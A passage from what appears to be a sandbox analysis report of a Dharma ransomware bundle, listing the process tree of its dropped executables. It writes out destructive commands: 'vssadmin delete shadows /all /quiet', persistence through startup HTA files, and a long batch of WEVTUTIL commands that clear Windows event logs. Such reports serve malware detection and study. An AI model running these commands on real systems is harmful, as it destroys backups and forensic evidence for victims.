  2⤵
  PID:4508
- - C:\Windows\system32\mode.com
    mode con cp select=1251
    3⤵
    PID:8492
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:6596
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
  2⤵
  PID:7448
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
  2⤵
  PID:7200

C:\Users\Admin\Documents\Dharma\mssql2.exe
"C:\Users\Admin\Documents\Dharma\mssql2.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3684

C:\Users\Admin\Documents\Dharma\nc123.exe
"C:\Users\Admin\Documents\Dharma\nc123.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1436

C:\Users\Admin\Documents\Dharma\mssql.exe
"C:\Users\Admin\Documents\Dharma\mssql.exe"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of SetWindowsHookEx
PID:3904

C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe
"C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6172

C:\Users\Admin\Documents\Dharma\unlocker.exe
"C:\Users\Admin\Documents\Dharma\unlocker.exe"
1⤵
- Executes dropped EXE
PID:6768
- C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp" /SL5="$305E4,1939817,139776,C:\Users\Admin\Documents\Dharma\unlocker.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:7752

C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe
"C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:8640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Test\Logdelete.bat" "
  2⤵
  PID:6156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7508
  - - C:\Windows\SysWOW64\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:8716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AMSI/Debug"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AirSpaceChannel"
    3⤵
    PID:6376
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:7572
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    - Clears Windows event logs
    PID:7308
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:12272
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    PID:12096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    PID:10684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "FirstUXPerf-Analytic"
    3⤵
    - Clears Windows event logs
    PID:8928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:8820
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "General Logging"
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:7872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "IHM_DebugChannel"
    3⤵
    PID:12032
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    PID:11144
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
    3⤵
    PID:9060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    PID:8888
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    PID:11228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"
    3⤵
    - Clears Windows event logs
    PID:11792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"
    3⤵
    PID:6656
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Internet Explorer"
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Key Management Service"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9756
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationDeviceMFT"
    3⤵
    PID:9524
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:6420
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationFrameServer"
    3⤵
    PID:11040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MedaFoundationVideoProc"
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MedaFoundationVideoProcD3D"
    3⤵
    PID:7468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationAsyncWrapper"
    3⤵
    PID:11216
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationContentProtection"
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationDS"
    3⤵
    PID:11000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationDeviceProxy"
    3⤵
    PID:10528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationMP4"
    3⤵
    PID:8020
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationMediaEngine"
    3⤵
    PID:10800
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPerformance"
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPerformanceCore"
    3⤵
    PID:9940
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPipeline"
    3⤵
    PID:9684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPlatform"
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "MediaFoundationSrcPrefetch"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-Client-Streamingux/Debug"
    3⤵
    PID:9256
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-Client/Admin"
    3⤵
    PID:10476
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-Client/Debug"
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-Client/Operational"
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-Client/Virtual Applications"
    3⤵
    PID:10552
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-AppV-SharedPerformance/Analytic"
    3⤵
    - Clears Windows event logs
    PID:9732
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Admin"
    3⤵
    PID:7696
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Debug"
    3⤵
    PID:6444
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Diagnostic"
    3⤵
    PID:7356
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-IE/Diagnostic"
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:9988
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-OneCore-Setup/Analytic"
    3⤵
    PID:8532
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:9908
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:6756
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-Admin/Debug"
    3⤵
    PID:8596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Debug"
    3⤵
    PID:8288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Operational"
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Analytic"
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Debug"
    3⤵
    PID:8696
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Operational"
    3⤵
    PID:9160
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-IPC/Operational"
    3⤵
    PID:10668
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
    3⤵
    PID:10620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    3⤵
    PID:8956
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
    3⤵
    PID:11060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AAD/Analytic"
    3⤵
    PID:9760
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AAD/Operational"
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:8468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ASN1/Operational"
    3⤵
    PID:8920
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:7580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:7872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Clears Windows event logs
    - System Location Discovery: System Language Discovery
    PID:8604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-All-User-Install-Agent/Admin"
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AllJoyn/Debug"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AllJoyn/Operational"
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppHost/Admin"
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppHost/ApplicationTracing"
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppHost/Diagnostic"
    3⤵
    PID:8672
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppHost/Internal"
    3⤵
    PID:10192
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:10348
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:10796
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:7628
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Deployment"
    3⤵
    PID:6228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Execution"
    3⤵
    PID:9964
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Admin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Analytic"
    3⤵
    PID:10632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Debug"
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Diagnostics"
    3⤵
    PID:9960
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-State/Debug"
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppModel-State/Diagnostic"
    3⤵
    PID:7240
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppReadiness/Admin"
    3⤵
    PID:8584
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppReadiness/Debug"
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppReadiness/Operational"
    3⤵
    - Clears Windows event logs
    - System Location Discovery: System Language Discovery
    PID:10672
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppSruProv"
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Diagnostic"
    3⤵
    PID:9412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Operational"
    3⤵
    PID:7640
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Debug"
    3⤵
    - Clears Windows event logs
    PID:9708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
    3⤵
    PID:11312
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Operational"
    3⤵
    PID:8164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Restricted"
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Analytic"
    3⤵
    PID:10984
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Operational"
    3⤵
    PID:10040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:8916
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:9804
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:8496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:9444
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    3⤵
    PID:8632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:10664
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:9692
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
    3⤵
    PID:7444
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:11380
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8768
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:6148
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Steps-Recorder"
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Debug"
    3⤵
    PID:8708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Operational"
    3⤵
    PID:10408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Performance"
    3⤵
    PID:9048
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Admin"
    3⤵
    PID:10756
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Operational"
    3⤵
    PID:10296
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Admin"
    3⤵
    PID:8064
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Operational"
    3⤵
    PID:10784
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AsynchronousCausality/Causality"
    3⤵
    PID:8516
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:11376
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/GlitchDetection"
    3⤵
    PID:7680
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Informational"
    3⤵
    PID:8308
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:11768
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8260
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/PlaybackManager"
    3⤵
    PID:7000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:8268
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:11616
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10876
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUser-Client"
    3⤵
    PID:8500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
    3⤵
    - Clears Windows event logs
    PID:8004
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
    3⤵
    PID:10624
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:8204
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/HCI"
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/L2CAP"
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Performance"
    3⤵
    PID:7572
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9260
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
    3⤵
    PID:8216
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    3⤵
    PID:11624
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Backup"
    3⤵
    PID:9768
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
    3⤵
    PID:6152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Battery/Diagnostic"
    3⤵
    PID:7964
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Biometrics/Analytic"
    3⤵
    PID:9792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:6452
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Management"
    3⤵
    PID:8412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Operational"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker/Tracing"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:11064
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11744
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
    3⤵
    PID:10872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-Bthmini/Operational"
    3⤵
    PID:11580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:10248
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-Policy/Operational"
    3⤵
    PID:11400
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:276
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:7060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    3⤵
    PID:11352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10056
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:7080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CAPI2/Catalog Database Debug"
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:11500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:8676
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/ApartmentInitialize"
    3⤵
    PID:10188
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/ApartmentUninitialize"
    3⤵
    PID:11576
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/Call"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/CreateInstance"
    3⤵
    PID:11824
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/ExtensionCatalog"
    3⤵
    PID:10196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/FreeUnusedLibrary"
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/RundownInstrumentation"
    3⤵
    PID:10532
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COMRuntime/Activations"
    3⤵
    PID:8572
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COMRuntime/MessageProcessing"
    3⤵
    PID:7844
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:11528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:11840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11304
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
    3⤵
    PID:11596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Cleanmgr/Diagnostic"
    3⤵
    PID:11892
- - C:\Windows\SysWOW64\wevtutil.exe
